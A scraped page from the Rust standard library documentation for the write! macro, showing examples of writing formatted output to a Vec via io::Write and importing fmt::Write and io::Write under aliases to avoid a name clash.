use std::io::Write; let mut w = Vec::new(); write!(&mut w, "test").unwrap(); write!(&mut w, "formatted {}", "arguments").unwrap(); assert_eq!(w, b"testformatted arguments");Run
A module can import both
std::fmt::Write and
std::io::Write and call
write! on objects
implementing either, as objects do not typically implement both. However, the module must
import the traits qualified so their names do not conflict:
use std::fmt::Write as FmtWrite; use std::io::Write as IoWrite; let mut s = String::new(); let mut v = Vec::new(); write!(&mut s, "{} {}", "abc", 123).unwrap(); // uses fmt::Write::write_fmt write!(&mut v, "s = {:?}", s).unwrap(); // uses io::Write::write_fmt assert_eq!(v, b"s = \"abc 123\"");Run");Run | https://doc.rust-lang.org/core/macro.write.html | CC-MAIN-2018-51 | refinedweb | 218 | 61.12 |
Not long ago PlayStation 3 homebrew developer Rtype released a Hatari v1.6.1 DBG Atari Emulator PS3 port, and today he is back with a Caprice32 4.1.0 DBG emulator port for PS3 as well.Not long ago PlayStation 3 homebrew developer Rtype released a Hatari v1.6.1 DBG Atari Emulator PS3 port, and today he is back with a Caprice32 4.1.0 DBG emulator port for PS3 as well.Sponsored Links
For those unaware, Caprice32 is a software emulator of the Amstrad CPC 8-bit home computer series. The emulator faithfully imitates the CPC464, CPC664, and CPC6128 models.
Download: [Register or Login to view links] / [Register or Login to view links]
To quote:.
(as you can play some old good games with this version, but be sure to know what exactly is an Amstrad CPC computer before lunch it on the PS3
) So ...) So ...
What?: A quick port of caprice32-4.1.0 to ps3 using PSL1GHTV2 / SDL.
Why? : It was the first computer i own.
Who? : Rtype
This is just an old Caprice32 version (4.1.0) for ps3 with psl1ght V2 sdk. Have no many freetime to work on it, so don't expect to much.
You will find binary in release.zip & source code (for those who want to look at) in capold-4.1.0.zip be sure to read READMEPS3.TXT before install.
Original project from Ulrich Doewich at Caprice32 | Free System Administration software downloads at [Register or Login to view links], so credits for him.
Finally, from the included ReadMe file:
A Lame Caprice32-4.1.0 DBG release for PS3.
What?: A quick port of caprice32-4.1.0 to ps3 using PSL1GHTV2.
Why? : It was the first computer i own.
Who? : Rtype
Caprice32-4.1.0 PS3/PSL1GHTV2
Modified source code for PS3 to compile and run on the sony PS3 with the PSL1GHTV2 SDK. You can download the caprice32 original source code here: [Register or Login to view links]
As you can see, this is the minimal hack to the original source code to compile and run under the PS3 with PSL1GHTV2 sdk.
All the credit of the caprice32 Emulator to Ulrich Doewich at [Register or Login to view links]
Also i use the psg.c & 6128.h & amsdos.h files from wiituka (author: dantoine) at [Register or Login to view links]
Know Problems:
- Works with a real keyboard or you have to use my lame virtual keyboard
- Virtual kbd is weak & wrong ...
- Some pb with SDL1.2 caprice32 code (ex: code Keysym 1.2 different from 1.3) so i make quick dirty hack not all the keys are working ...
- Sound not working as expected ,no time for now to look at the pb.
- I've quickly coded a lame disk browser so only file with ext .dsk or .DSK (no more than 400) are showing the files are not sorting, and the browser/browsing is bad
- I've not tested very well, just few games , so maybe other pb around ...
Sorry for all this problems but i hope you enjoy anyway somes old good games.
Quick Install & Start:
- Create somes dir in /dev_hdd0/ : /dev_hdd0/HOMEBREW and /dev_hdd0/HOMEBREW/amstrad
- Put some cpc dsk (.dsk or .DSK , no zip) in : /dev_hdd0/HOMEBREW/ST/
- Install the pkg.
- In emulator press L1 to load a dsk, then L2 for execute a CAT on dsk and see the name of executable, then L3 for write a RUN" and finally use kbd to write the name of executable and press return (or CIRCLE)
ex:
1) L1-> load arkanoid.dsk
2) L2-> cat
Drive A: user 0
ARKANOID. * 8k
133K free
3) L3-> run"
4) complete with kdb(real or virtual ) to have :
run"ARKANOID
5) Press ENTER from kbd or Press CIRCLE to load game
6) Optional Press R3 to enable DBG and SOUND (beware Sound not working as expected)
INGAME CONTROLS :
Works with a real keyboard or use the lame wirtual keyboard .
1) In game
on ps3 joystick:
LEFTSTICK= CPC JOY MOVE | UP/DOWN/RIGHT/LEFT
BCROSS= Button1 | X
BSQUARE= button2 | Z
on real kbd:
as expected (hum not really)
2) In the file dsk browser
LEFTSTICK_UP > scroll up
LEFTSTICK_DOWN > scroll down
LEFTSTICK_LEFT > page up
LEFTSTICK_RIGHT > page down
BCROSS= load
BSQUARE= cancel
3) System key
on real kbd:
F5 reset
F6 loaddrive
F10 exit
on ps3 joystick:
L1 load dsk browser
R1 show virtual kbd
R2 valid a virtual key
L2 type cat + return
L3 type run"
R3 toggle DBG flag , IF DGB ON > show fps and sound on
TRIANGLE type DEL
CIRCLE type ENTER
START reset
SELECT exit
TODO :
- add sna load/save
- update to 4.2.0 source code
- fix sound
- fix keyboard
- fix browser
Credit:
Special thanks to :
Ulrich Doewich (Emulator author), dantoine for wiituka (i use psg.c & 6128.h amsdos.h from wiituka), All PS3DEV, KaKaRoTo (very big thanks for your works), Hermes, Oopo, Deroad... Bonjour chez vous!
More PlayStation 3 News... | http://www.ps3news.com/forums/ps3-hacks-jailbreak/caprice32-4-1-0-dbg-amstrad-cpc-8-bit-emulator-ps3-port-arrives-122888-post412834.html | CC-MAIN-2014-41 | refinedweb | 829 | 72.16 |
Unit Testing, Agile Development, Architecture, Team System & .NET - By Roy Osherove
Ads Via DevMavens
Note: This is part 1 of a series of articles:
Part 2 - Practical Parsing Using Groups in Regular Expressions
In this article I’ll demonstrate the use of the following:
· Using the System.Text.RegularExpressions Namespace classes for text parsing
· Using System.IO Namespace classes to read text files
· Expresso – A tool for testing Regular Expressions
Regular expressions (a.k.a “Regex”) are a very powerful text parsing language used widely in many parts of the technology industry.
Their main use is to find a particular pattern within a given string that matches whatever rules were expressed using this language.
In software applications, we will usually test whether the Regex Found a match for a pattern with the rules we defined, and based on the success of the search , perform certain actions such as validate an email address or finding HTTP link in a web page.
The Regex language can be used for both simple searches as well as for more complicated patterns such as finding all words in a given string that appear more then once within all the given text. Another use for Regex is to replace the string matching the pattern with another string (for example, making all lowercase words Uppercase, or replacing all replacing all “Five” to “5”).
A simple example would be to find a match for a pattern fitting an email address.
Let’s take a look at how an email address is built. Taking Royo@SomeWhere.com as an example:
We know there is a pattern here, since we know there will always be at least 5 parts:
- A string
- A “@” character
- A “.”
- Another String
If you were to receive a string and determine whether it is a legitimate email address you would have several options:
· Parse the string using cumbersome code for the existence of specific characters (which we mentioned above)
o You need to check for hardcoded characters in your given string using String.IndexOf() and that sort of thing
o You need to code lots of lines of code to perform complicated pattern searching (email pattern is very simple yet would take a pretty complicated “If” structure to apply correctly
· Use the Regex Class found in the System.Text.RegularExpressions Namespace to check for an email pattern match
o 2 lines of code
In order to practice the following example, you will need to download and install Expresso – A regular expression testing tool and much more. After you have installed it fire it up.
The main screen is divided into 3 main sections :
- The Regular expression input pane(upper part)
This is where we try out different expressions and test for the parsing outcome in the output pane
- The Data Input Pane(Lower Left)
The data to be parsed and tested. This is where we enter our sample data.
- The Output Pane (Lower right)
The outcome of the Regex parsing engine.
Expresso starts up with a predefined sample expression already inside its expression pane.
You can tell by the "# Dates" inside that this expression deals with parsing for dates inside text.
It already has some sample data filled in as well. To see what the parsing results look like, you can just click "Find Matches" button and see what happens.
The output pane is filled with all the strings that matched the particular pattern in the expression pane.
Notice that the results are also hierarchical, and can be expanded. This is another feature of Regex , which allows you to express groups to be captured and referred to by name, within an expression. But enough with this sample, since it is a bit to complicated for starters.
Let's do an easier sample, and I'll explain from the start.
Say we have some lines of text that we need to parse and retrieve email addresses from.
[Paste the following into the data pane in expresso]
This is a piece of text. It represents some email addresses.
For example royo@somewhere.com is an email address. Another one could be
Perhaps just junk@address.co.au or maybe it's @234.34.23.com.
For conclusion, here are some more junk email addresses. @. something@.
@somewhere. @.com something@.com @somwehre.com
This is the end of the text to be pasted into expresso.
Here’s a pattern to find a match for an email address using regular expressions :
\w*@\w*\.\w*((\.\w*)*)?
Like almost anything in languages, this can be expressed in more then one way, since the language itself contains many possibilities,
but let’s dissect this expression:
“\w “– An escape character meaning “Characters usually found in words”.
This means alpha numeric characters, but excludes spaces, punctuation marks and tabs.
Basically, anything that could be considered as being a non-word character is excluded.
“*” – The asterisk sign means “0 or more instances of” and operates on the expression to the left of it.
Thus, “\w*” means “match zero or more occurrences of any word-like character”
“@” – Match one instance of the character “@”
“\w*” - “match zero or more occurrences of any word-like character”
“\.” – Match one instance of the dot character (this requires an escape slash since “.” Is a reserved operator in the regex language)
“()“ – Groups what is inside the round brackets into a logical group
(\.\w*)* - Match zero or more instances of a dot followed by a zero or more instances of any word-like character
()? – optional group – Match this if it appears in the text
According to the last 3 explanations here’s an overall explanation to the last part of the expression:
((\.\w*)*)? – means there might be zero or more instance of a dot followed by a word (“.something.anotherthing.bla” would be matched)
To conclude, here’s the description of this expression in whole:
Match any word followed by an asterisk , followed by any word followed by a dot ,followed by any word. Followed by zero or more instances of a dot and a word after it.
Paste the pattern mentioned above into the expression pane of expresso. Once you've done that, click the "find matches" button.
You can see in the output pane, that the Regex engine recovered only part of the data that appears in the data pane. It returned only strings which match the expression that was given.
Can you see a problem yet?
Can you find a logical problem with this expression?
These strings were matched as well, although they are not legitimate email addresses.
@.
something@.
@somewhere.
@.com
something@.com
@somwehre.com
The problem is we tested for zero or more instances of a character, so this string was accepted as well. We needed to specify “1 or more instances of” instead.
This is easily expressed using the “+” operator instead of the "*" operator.
Try to fix the expression yourself and hit "Find Matches again"..
Here’s the fixed expression to catch only valid instances
\w+@\w+\.\w+((\.\w+)*)?
This will catch only the two legitimate email addresses.
As you can see, It's pretty easy to work with regular expressions, once you know the syntax.
A table of syntax for Regex can be found here.
Here's the source code listing for a simple form , which reads a text file name "data.txt" found in it's directory.
Data.txt contains the same text as mentioned above , which you have put in the "data" pane of expresso.
The form reads the file, then uses the Regex class to get a MatchCollection object, which is a collection of Match Objects.
Each Match Object contains the value of the string that was parsed.
using System;
using System.Drawing;
using System.Collections;
using System.ComponentModel;
using System.Windows.Forms;
using System.Data;
//we add the following import staements
using System.Text.RegularExpressions;
using System.IO;
using System.Text;
.
//This is the method we will call on form load
private void ParseData()
{
listBox1.Items.Clear();
//Read the data.txt file to parse for emails
string data = GetDataFromFile();
//the pattern used to parse for emails
//notice the '@' at the start to avoid escape special
//characters treated as escape sequences
string expression = @"\w+@\w+\.\w+((\.\w+)*)?";
//get a collection of successfull matches
//from Regex using the specified pattern on the input data
MatchCollection matches = Regex.Matches(data,expression);
//Iterate through the matches, adding them to the list box
foreach(Match SingleMatch in matches)
{
listBox1.Items.Add(SingleMatch.Value);
}
}
private string GetDataFromFile()
//Use the Path Class to generate FIle paths from a given folder and a file name
string filename = Path.Combine(Application.StartupPath,"data.txt");
//open a text file for reading
StreamReader reader = File.OpenText(filename);
//get all the text in the file
string ret = reader.ReadToEnd();
//dismiss the file handle
reader.Close();
//return the text in the file
return ret;
Using Regular expressions and the Regex object is very simple, and very powerful. Once you learn it, you'll use it all over the place – In search dialogs, Coding and sometimes even search engines. In future articles I will demonstrate more elaborate uses of regular expressions, and how they fit in an overall practical solution.
(You can find more on the syntax of Regex here.)).
The link to expresso is broken. Can you update it please> | http://weblogs.asp.net/rosherove/articles/6863.aspx | crawl-002 | refinedweb | 1,542 | 64 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.